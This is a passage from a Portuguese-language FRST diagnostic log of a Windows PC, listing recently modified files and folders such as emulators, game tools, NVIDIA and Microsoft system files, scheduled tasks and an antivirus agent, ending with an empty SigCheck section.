2022-08-19 01:59 - 2021-11-29 05:29 - 000000000 ____D C:\Users\trean\AppData\Roaming\DS4Windows
2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {9f9c9e51-d42f-4462-a27a-7d419da18045}
2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {58E22E6B-0E58-4E93-AF9A-036556EB66F5}
2022-08-18 04:11 - 2022-05-01 05:06 - 000000000 ____D C:\ProgramData\Intel Package Cache {1CEAC85D-2590-4760-800F-8DE5E91F3700}
2022-08-18 02:39 - 2022-02-08 01:41 - 000000000 ____D C:\Program Files\Cheat Engine 7.4
2022-08-17 00:09 - 2021-07-03 00:57 - 000000000 ____D C:\Users\trean\AppData\Roaming\Citra
2022-08-16 23:58 - 2021-06-28 05:30 - 000000000 ____D C:\Users\trean\AppData\Roaming\Adobe
2022-08-16 16:43 - 2021-06-28 05:36 - 000000000 ____D C:\Users\trean\AppData\Local\D3DSCache
2022-08-16 16:30 - 2021-06-05 09:01 - 000131072 _____ C:\WINDOWS\system32\config\ELAM
2022-08-16 16:28 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\SecurityHealth
2022-08-16 15:12 - 2021-06-28 06:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-08-16 07:03 - 2022-03-29 21:25 - 000000000 ____D C:\Program Files (x86)\Origin
2022-08-15 18:03 - 2022-06-15 23:05 - 000000000 ___RD C:\Users\trean\Desktop\Bomberman
2022-08-15 18:02 - 2021-07-04 00:35 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-08-14 15:35 - 2022-04-29 09:00 - 000000000 ____D C:\Users\trean\.dotnet
2022-08-14 05:19 - 2022-03-09 15:39 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-535022414-3499471442-1354494860-1001
2022-08-14 05:19 - 2022-03-09 15:39 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-535022414-3499471442-1354494860-1001
2022-08-14 05:19 - 2021-06-28 06:29 - 000002385 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-08-14 04:51 - 2021-12-21 03:12 - 000000000 ____D C:\Users\trean\AppData\Roaming\obs-studio
2022-08-13 19:38 - 2021-06-28 06:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-08-13 10:42 - 2022-03-09 15:15 - 000000000 ____D C:\Users\trean
2022-08-13 02:37 - 2021-06-28 07:08 - 000000000 ____D C:\Arquivos de Jogos
2022-08-12 18:25 - 2021-08-25 10:15 - 000000000 ____D C:\Users\trean\AppData\Roaming\changzhi2
2022-08-10 16:23 - 2022-03-09 15:35 - 000301888 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SystemResources
2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2022-08-10 16:22 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-08-10 15:39 - 2021-06-28 06:05 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-08-10 15:37 - 2021-06-28 06:05 - 144534560 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-08-10 15:36 - 2022-03-09 15:36 - 003103744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-08-10 15:32 - 2021-07-07 01:52 - 000000000 ____D C:\Program Files\dotnet
2022-08-10 15:32 - 2021-06-28 06:52 - 000000000 ____D C:\ProgramData\Package Cache
2022-08-10 15:32 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\SecureBootUpdates
2022-08-09 18:17 - 2021-06-28 06:52 - 000000000 ____D C:\Users\trean\AppData\Local\NVIDIA
2022-08-09 07:04 - 2022-06-12 22:44 - 000000000 ____D C:\Users\trean\AppData\Local\ElevatedDiagnostics
2022-08-09 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\Registration
2022-08-09 05:24 - 2022-03-09 15:39 - 000003846 _____ C:\WINDOWS\system32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2022-08-09 05:24 - 2021-06-29 10:42 - 000000000 ____D C:\Program Files\Bitdefender Agent
2022-08-08 20:56 - 2021-07-10 01:20 - 000000000 ____D C:\Users\trean\AppData\Roaming\RenPy
2022-08-06 02:32 - 2021-07-15 17:56 - 000000000 ____D C:\Users\trean\Desktop\an
2022-08-03 08:06 - 2022-04-01 16:03 - 000001326 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ElevenClock Settings.lnk
2022-08-03 08:06 - 2022-04-01 16:03 - 000001304 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ElevenClock.lnk
2022-08-02 16:19 - 2021-07-09 03:09 - 000000000 ____D C:\Users\trean\AppData\Roaming\Parsec
2022-08-02 12:22 - 2021-08-25 10:14 - 000000000 ____D C:\Users\trean\AppData\Roaming\XuanZhi64
2022-08-02 12:22 - 2021-08-25 10:11 - 000000000 ____D C:\LDPlayer
2022-08-02 02:24 - 2021-08-25 10:15 - 000000000 ____D C:\Users\trean\.Ld2VirtualBox
2022-07-31 05:27 - 2022-05-08 21:20 - 000000000 ____D C:\Users\trean\Desktop\Backup
2022-07-29 13:06 - 2022-04-19 02:02 - 002754000 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000402904 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000234960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000144856 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-29 13:06 - 2022-04-19 02:02 - 000067032 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-29 08:19 - 2021-08-10 18:18 - 000000000 ____D C:\Users\trean\AppData\Roaming\yuzu
2022-07-28 18:18 - 2021-06-28 05:30 - 000000000 ____D C:\Users\trean\AppData\Local\Packages
2022-07-28 04:20 - 2022-02-14 17:13 - 007483424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2022-07-28 04:20 - 2022-02-14 17:13 - 006367440 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2022-07-26 21:47 - 2022-03-10 00:09 - 000003580 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d833e4979d68b7
2022-07-26 21:47 - 2022-03-09 15:39 - 000003674 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-25 07:52 - 2021-06-28 06:46 - 000000000 ____D C:\Users\trean\AppData\Local\SquirrelTemp
2022-07-24 08:57 - 2021-10-21 03:37 - 000001472 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk
2022-07-24 08:57 - 2021-10-21 03:37 - 000001464 _____ C:\Users\trean\Desktop\NVIDIA GeForce NOW.lnk
2022-07-24 08:57 - 2021-06-28 06:52 - 000000000 ____D C:\Users\trean\AppData\Local\NVIDIA Corporation
2022-07-24 05:13 - 2022-07-18 00:31 - 000000000 ____D C:\Users\trean\AppData\Roaming\BetterDiscord
2022-07-23 05:30 - 2021-06-05 15:03 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\Provisioning
2022-07-23 05:30 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2022-07-23 01:03 - 2021-08-05 23:57 - 000000000 ____D C:\Users\trean\Desktop\b
2022-07-23 00:19 - 2021-06-28 06:45 - 000001100 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2022-07-23 00:19 - 2021-06-28 06:45 - 000000000 ____D C:\Users\trean\AppData\Roaming\Notepad++
2022-07-22 01:25 - 2022-02-14 17:13 - 000130216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys

==================== Arquivos na raiz de alguns diretórios ========

2021-11-05 13:18 - 2021-11-08 01:44 - 000000032 _____ () C:\Users\trean\AppData\Roaming\.machineId
2021-08-25 10:15 - 2021-08-25 10:15 - 000000064 _____ () C:\Users\trean\AppData\Roaming\changzhi_leidian.data
2021-08-25 10:15 - 2021-10-01 13:24 - 000000050 _____ () C:\Users\trean\AppData\Roaming\changzhi_leidianmac.data
2022-08-13 02:48 - 2022-08-13 02:48 - 000001080 _____ () C:\Users\trean\AppData\Roaming\tof_launcher.reg
2022-01-18 09:11 - 2022-01-18 09:18 - 000001456 _____ () C:\Users\trean\AppData\Local\Adobe Salvar para Web 13.0 Prefs
2021-09-21 06:30 - 2021-09-21 06:30 - 000016438 _____ () C:\Users\trean\AppData\Local\partner.bmp
2022-07-31 20:40 - 2022-07-31 20:40 - 000000218 _____ () C:\Users\trean\AppData\Local\recently-used.xbel
2022-02-21 07:31 - 2022-02-21 07:31 - 000007605 _____ () C:\Users\trean\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Não há correção automática para arquivos que não passaram na verificação.)

==================== Fim de FRST.txt ========================